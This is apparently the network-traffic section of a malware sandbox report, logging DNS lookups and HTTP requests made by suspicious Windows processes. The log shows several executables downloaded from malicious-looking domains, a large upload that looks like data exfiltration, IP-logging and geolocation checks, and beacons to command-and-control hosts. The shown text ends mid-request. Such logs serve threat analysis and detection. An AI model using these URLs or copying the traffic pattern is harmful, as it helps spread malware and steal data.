Date: Wed, 05 May 2021 17:35:30 GMT
Server: Apache
Last-Modified: Thu, 06 Jun 2019 05:01:20 GMT
Accept-Ranges: bytes
Content-Length: 137168
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: image/jpeg
POST

http://weirdtrendz.com/4.jpg

svchost.exe

Remote address:

95.217.40.222:80

Request

POST /4.jpg HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: weirdtrendz.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:35:30 GMT
Server: Apache
Last-Modified: Thu, 06 Jun 2019 05:01:30 GMT
Accept-Ranges: bytes
Content-Length: 440120
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: image/jpeg
POST

http://weirdtrendz.com/5.jpg

svchost.exe

Remote address:

95.217.40.222:80

Request

POST /5.jpg HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: weirdtrendz.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:35:30 GMT
Server: Apache
Last-Modified: Thu, 06 Jun 2019 05:01:44 GMT
Accept-Ranges: bytes
Content-Length: 1246160
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: image/jpeg
POST

http://weirdtrendz.com/7.jpg

svchost.exe

Remote address:

95.217.40.222:80

Request

POST /7.jpg HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: weirdtrendz.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:35:31 GMT
Server: Apache
Last-Modified: Thu, 06 Jun 2019 05:02:02 GMT
Accept-Ranges: bytes
Content-Length: 83784
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: image/jpeg
POST

http://weirdtrendz.com/main.php

svchost.exe

Remote address:

95.217.40.222:80

Request

POST /main.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: weirdtrendz.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:35:32 GMT
Server: Apache
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
POST

http://weirdtrendz.com/

svchost.exe

Remote address:

95.217.40.222:80

Request

POST / HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 1291398
Host: weirdtrendz.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:35:32 GMT
Server: Apache
Content-Length: 0
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

www.facebook.com

huesaa.exe

Remote address:

8.8.8.8:53

Request

www.facebook.com

IN A

Response

www.facebook.com

IN CNAME

star-mini.c10r.facebook.com

star-mini.c10r.facebook.com

IN A

31.13.64.35
GET

https://www.facebook.com/

gpooe.exe

Remote address:

31.13.64.35:443

Request

GET / HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Host: www.facebook.com

Response

HTTP/1.1 200 OK

content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
Cache-Control: private, no-cache, no-store, must-revalidate
X-Frame-Options: DENY
X-XSS-Protection: 0
Strict-Transport-Security: max-age=15552000; preload
X-Content-Type-Options: nosniff
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Vary: Accept-Encoding
Pragma: no-cache
x-fb-rlafr: 0
Content-Type: text/html; charset="utf-8"
X-FB-Debug: RcrfeKsuAMzrd0tSwxAnNZ11f8uogPFp1Fs4P82Oo6QiuzdUnvuvJBvRzHDD718J78XTIvl/753N4a0cIEmTOA==
Date: Wed, 05 May 2021 17:35:32 GMT
Priority: u=3,i
Transfer-Encoding: chunked
Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
Connection: keep-alive
GET

https://www.facebook.com/

gpooe.exe

Remote address:

31.13.64.35:443

Request

GET / HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Host: www.facebook.com

Response

HTTP/1.1 200 OK

content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
Cache-Control: private, no-cache, no-store, must-revalidate
X-Frame-Options: DENY
X-XSS-Protection: 0
Strict-Transport-Security: max-age=15552000; preload
X-Content-Type-Options: nosniff
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Vary: Accept-Encoding
Pragma: no-cache
x-fb-rlafr: 0
Content-Type: text/html; charset="utf-8"
X-FB-Debug: shYZfRmPvSNB7uANxJ6jJBkOVStjt/rPsByzlXowRpSwJjCVseUgR68PSt+oF27bK6mai+gIAPhlll3Dikeo8A==
Date: Wed, 05 May 2021 17:35:40 GMT
Priority: u=3,i
Transfer-Encoding: chunked
Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
Connection: keep-alive
DNS

menazb.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

menazb.pw

IN A

Response

menazb.pw

IN A

108.61.160.236
GET

http://menazb.pw/kiuy/jg8_mysu.exe

SHyqaefepynae.exe

Remote address:

108.61.160.236:80

Request

GET /kiuy/jg8_mysu.exe HTTP/1.1
Host: menazb.pw
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Type: application/octet-stream
Last-Modified: Wed, 05 May 2021 08:40:17 GMT
Accept-Ranges: bytes
ETag: "c0ad75468a41d71:0"
Server: Microsoft-IIS/8.5
Date: Wed, 05 May 2021 17:35:34 GMT
Content-Length: 1095168
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A

Response
DNS

facebook.websmails.com

SystemNetworkService

Remote address:

8.8.8.8:53

Request

facebook.websmails.com

IN A

Response

facebook.websmails.com

IN A

167.179.89.78
DNS

facebook.websmails.com

SystemNetworkService

Remote address:

8.8.8.8:53

Request

facebook.websmails.com

IN AAAA

Response
DNS

file.ekkggr3.com

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

file.ekkggr3.com

IN A

Response

file.ekkggr3.com

IN A

172.67.162.110

file.ekkggr3.com

IN A

104.21.66.169
GET

http://file.ekkggr3.com/iuww/huesaa.exe

SHyqaefepynae.exe

Remote address:

172.67.162.110:80

Request

GET /iuww/huesaa.exe HTTP/1.1
Host: file.ekkggr3.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:35:37 GMT
Content-Type: application/octet-stream
Content-Length: 992256
Connection: keep-alive
Set-Cookie: __cfduid=d9a83937366b6c0af782c537ed5b120d91620236137; expires=Fri, 04-Jun-21 17:35:37 GMT; path=/; domain=.ekkggr3.com; HttpOnly; SameSite=Lax
Last-Modified: Sat, 06 Mar 2021 07:46:26 GMT
ETag: "60433352-f2400"
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
cf-request-id: 09df328bec00000c597fbd5000000001
Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=4L7K6RHGAbTlt82%2FoAn%2FLUQB1mAdB7VftvEoh4OKb5al%2BBQTdu9s8%2BNyjUDw16hyIWb6O7vm%2BkVVwxAmuOYgBRaW03ET2OevDEdTEw2C7zyj"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 64abb9f31e640c59-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
GET

http://101.36.107.74/seemorebty/il.php?e=jg8_mysu

jg8_mysu.exe

Remote address:

101.36.107.74:80

Request

GET /seemorebty/il.php?e=jg8_mysu HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
Accept-Language: en-US,en;q=0.9
Referer: https://www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
Host: 101.36.107.74

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:35:39 GMT
Server: Apache/2.4.37 (centos)
X-Powered-By: PHP/7.2.24
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A

Response
GET

https://iplogger.org/ZdTF9

jg8_mysu.exe

Remote address:

88.99.66.31:443

Request

GET /ZdTF9 HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
Accept-Language: en-US,en;q=0.9
Referer: https://www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
Host: iplogger.org

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:35:39 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=bu72ug5ev9enm7e1cb39n70bu1; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=154.61.71.13; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=258812052; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: ec5f700afd95c4901273a4ec86c0feb322adec405ece3a022dc8272621895297
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
GET

http://ip-api.com/json/

huesaa.exe

Remote address:

208.95.112.1:80

Request

GET /json/ HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Host: ip-api.com

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:35:39 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 323
Access-Control-Allow-Origin: *
X-Ttl: 45
X-Rl: 10
DNS

www.turbosino.com

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

www.turbosino.com

IN A

Response

www.turbosino.com

IN A

103.155.92.96
GET

http://www.turbosino.com/askhelp39/askinstall39.exe

SHyqaefepynae.exe

Remote address:

103.155.92.96:80

Request

GET /askhelp39/askinstall39.exe HTTP/1.1
Host: www.turbosino.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

Server: nginx
Date: Wed, 05 May 2021 17:35:40 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.6.40
Location: http://www.turbosino.com/askinstall39.exe
GET

http://www.turbosino.com/askinstall39.exe

SHyqaefepynae.exe

Remote address:

103.155.92.96:80

Request

GET /askinstall39.exe HTTP/1.1
Host: www.turbosino.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:35:40 GMT
Content-Type: application/octet-stream
Content-Length: 1458176
Last-Modified: Tue, 04 May 2021 02:09:12 GMT
Connection: keep-alive
ETag: "6090acc8-164000"
Accept-Ranges: bytes
DNS

www.wws23dfwe.com

powershell.exe

Remote address:

8.8.8.8:53

Request

www.wws23dfwe.com

IN A

Response

www.wws23dfwe.com

IN A

45.76.53.14
DNS

askhelp.datasdm9dsx.xyz

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

askhelp.datasdm9dsx.xyz

IN A

Response

askhelp.datasdm9dsx.xyz

IN A

66.42.64.195
GET

https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6

MicrosoftEdgeCP.exe

Remote address:

192.243.59.20:443

Request

GET /e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6 HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Accept-Encoding: gzip, deflate, br
Host: www.profitabletrustednetwork.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.17.9
Date: Wed, 05 May 2021 17:35:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: u_pl=14575867; expires=Thu, 06 May 2021 17:35:44 GMT
Set-Cookie: ain=eyJhbGciOiJIUzI1NiJ9.eyJwIjp7ImlkIjoxNDU3NTg2NywiayI6ImE5NzFiYmU0YTQwYTcyMTZhMWE4N2Q4ZjQ1NWY3MWU2Iiwic2lkIjoiIiwiaXNpZCI6MiwiYXNpZCI6MSwiemlkIjoxMDYzMzYsInBpZCI6ODUxNTUsImFuIjp0cnVlLCJsYW4iOnRydWUsImNpZCI6MywiYWlkIjoyOCwicHQiOjQsInBrIjoiZTJxOHp1OWh1IiwiY3BrcyI6eyAiMzQiOiJiOGI2ZGRmN2IwNzdlMDgwMmYyYzMxMGU1MjgwM2ExZCJ9LCJ0IjoxfSwidSI6eyJ1IjoxLCJhdSI6MSwiZCI6eyJpZCI6NjAzNzY3LCJpZHMiOiIiLCJpYyI6ZmFsc2UsIm4iOiJEZXNrdG9wfEVtdWxhdG9yIiwidiI6IlVua25vd24iLCJtIjoiVW5rbm93biIsImYiOjEsImZuIjoiRGVza3RvcCIsIm9pZCI6Mzg5MTQsIm9uIjoiV2luZG93cyIsIm92IjoiMTAuMCIsImJpZCI6NjgwMDEsImJuIjoiRWRnZSIsImJ2IjoiMTUiLCJ3diI6ZmFsc2UsImUiOmZhbHNlLCJhYiI6ZmFsc2V9LCJjIjp7ImlkIjoyMjMsImMiOiJVUyIsIm4iOiJVbml0ZWQgU3RhdGVzIn0sImEiOmZhbHNlLCJjciI6eyJuIjoiQ29nZW50IENvbW11bmljYXRpb25zIn0sInhmIjoiIiwiaXhmIjpmYWxzZSwiaWd4ZiI6ZmFsc2UsInVwIjp0cnVlLCJyIjoiIn19.552cZvC5zY6d-ELysi_3P64nQ7K_aGqASdomAgVqgg0; expires=Wed, 05 May 2021 17:36:44 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
X-Request-ID: 806cd34922dd14692bc74dbdf5536990
Strict-Transport-Security: max-age=0; includeSubdomains
Content-Encoding: gzip
GET

http://askhelp.datasdm9dsx.xyz/index.php?count=askhelp136cc

SHyqaefepynae.exe

Remote address:

66.42.64.195:80

Request

GET /index.php?count=askhelp136cc HTTP/1.1
Host: askhelp.datasdm9dsx.xyz
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 05 May 2021 17:35:42 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4545
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: ThinkPHP
Set-Cookie: PHPSESSID=nolvk2gdq7k1hrjqjvnku93lo0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
POST

http://www.wws23dfwe.com/index.php/api/a

powershell.exe

Remote address:

45.76.53.14:80

Request

POST /index.php/api/a HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-Length: 577
Host: www.wws23dfwe.com

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:35:42 GMT
Server: Apache
Upgrade: h2
Connection: Upgrade, close
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
GET

https://www.facebook.com/

huesaa.exe

Remote address:

31.13.64.35:443

Request

GET / HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Host: www.facebook.com

Response

HTTP/1.1 200 OK

content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
Cache-Control: private, no-cache, no-store, must-revalidate
X-Frame-Options: DENY
X-XSS-Protection: 0
Strict-Transport-Security: max-age=15552000; preload
X-Content-Type-Options: nosniff
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Vary: Accept-Encoding
Pragma: no-cache
x-fb-rlafr: 0
Content-Type: text/html; charset="utf-8"
X-FB-Debug: jirNfhgJuv3/ntu4f+Pu/kptOfNX//3LPPL4dOVeCt8r1SvzPMwdg9fl2cSqeOTBzNkiijXRcdu4pt2/LqQMFQ==
Date: Wed, 05 May 2021 17:35:42 GMT
Priority: u=3,i
Transfer-Encoding: chunked
Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
Connection: keep-alive
GET

https://www.facebook.com/

huesaa.exe

Remote address:

31.13.64.35:443

Request

GET / HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Host: www.facebook.com

Response

HTTP/1.1 200 OK

content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
Cache-Control: private, no-cache, no-store, must-revalidate
X-Frame-Options: DENY
X-XSS-Protection: 0
Strict-Transport-Security: max-age=15552000; preload
X-Content-Type-Options: nosniff
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Vary: Accept-Encoding
Pragma: no-cache
x-fb-rlafr: 0
Content-Type: text/html; charset="utf-8"
X-FB-Debug: MN2qdbN1iL56xTQOuWy6ubHTpPICmcz5usgdwDXIVSl8ntQSx06WHyH5IpDTG9Za6X+U+w43iM2CvoRKr6fqJA==
Date: Wed, 05 May 2021 17:35:49 GMT
Priority: u=3,i
Transfer-Encoding: chunked
Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
Connection: keep-alive
DNS

africaleadnews.com

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

africaleadnews.com

IN A

Response

africaleadnews.com

IN A

208.91.198.55
GET

http://africaleadnews.com/Setup_v3.exe

SHyqaefepynae.exe

Remote address:

208.91.198.55:80

Request

GET /Setup_v3.exe HTTP/1.1
Host: africaleadnews.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 05 May 2021 17:35:43 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade
Last-Modified: Wed, 05 May 2021 12:57:53 GMT
Accept-Ranges: bytes
Content-Length: 1196200
Content-Type: application/x-msdownload
DNS

www.cncode.pw

powershell.exe

Remote address:

8.8.8.8:53

Request

www.cncode.pw

IN A

Response

www.cncode.pw

IN A

50.17.5.224
GET

http://www.cncode.pw/

askinstall39.exe

Remote address:

50.17.5.224:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Host: www.cncode.pw
Cache-Control: no-cache
DNS

htagzdownload.pw

SHyqaefepynae.exe

Remote address:

8.8.8.8:53

Request

htagzdownload.pw

IN A

Response
DNS

bitbucket.org

powershell.exe

Remote address:

8.8.8.8:53

Request

bitbucket.org

IN A

Response

bitbucket.org

IN A

104.192.141.1
GET

https://bitbucket.org/dedenpurdinan/dedenpurdinan/downloads/y1.exe

SHyqaefepynae.exe

Remote address:

104.192.141.1:443

Request

GET /dedenpurdinan/dedenpurdinan/downloads/y1.exe HTTP/1.1
Host: bitbucket.org
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self'
Server: nginx
X-Usage-Quota-Remaining: 994740.347
Vary: Accept-Language
X-Usage-Request-Cost: 877.53
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
X-B3-TraceId: a675d77d795357c2
X-Usage-Output-Ops: 0
X-Dc-Location: Micros
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Wed, 05 May 2021 17:35:45 GMT
bbr1repopath: /data/c03/n06/p/vp1734/data/d-129/r-86118129
X-Usage-User-Time: 0.026326
X-Usage-System-Time: 0.000000
Location: https://bbuseruploads.s3.amazonaws.com/3deaabfc-ae97-4c6c-91dd-474d89cc6fb3/downloads/f474c475-65ed-49b0-b11a-ce669aa94772/y1.exe?Signature=fZ3p%2F4uIm2ptKD%2F7I8rASzVLwZI%3D&Expires=1620237756&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=UxyiqDHpL8VKzeVEuRYjNDkhVa15UTRI&response-content-disposition=attachment%3B%20filename%3D%22y1.exe%22
X-Served-By: f17435786606
Expires: Wed, 05 May 2021 17:35:45 GMT
Content-Language: en
X-View-Name: bitbucket.apps.downloads.views.download_file
X-Static-Version: 6340413fa710
X-Render-Time: 0.0694742202759
Connection: keep-alive
X-Usage-Input-Ops: 0
X-Request-Count: 2339
X-Frame-Options: SAMEORIGIN
X-Version: 6340413fa710
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 0
DNS

uyyge5w3ye.2ihsfa.com

gpooe.exe

Remote address:

8.8.8.8:53

Request

uyyge5w3ye.2ihsfa.com

IN A

Response

uyyge5w3ye.2ihsfa.com

IN A

207.246.80.14
GET

http://uyyge5w3ye.2ihsfa.com/api/fbtime

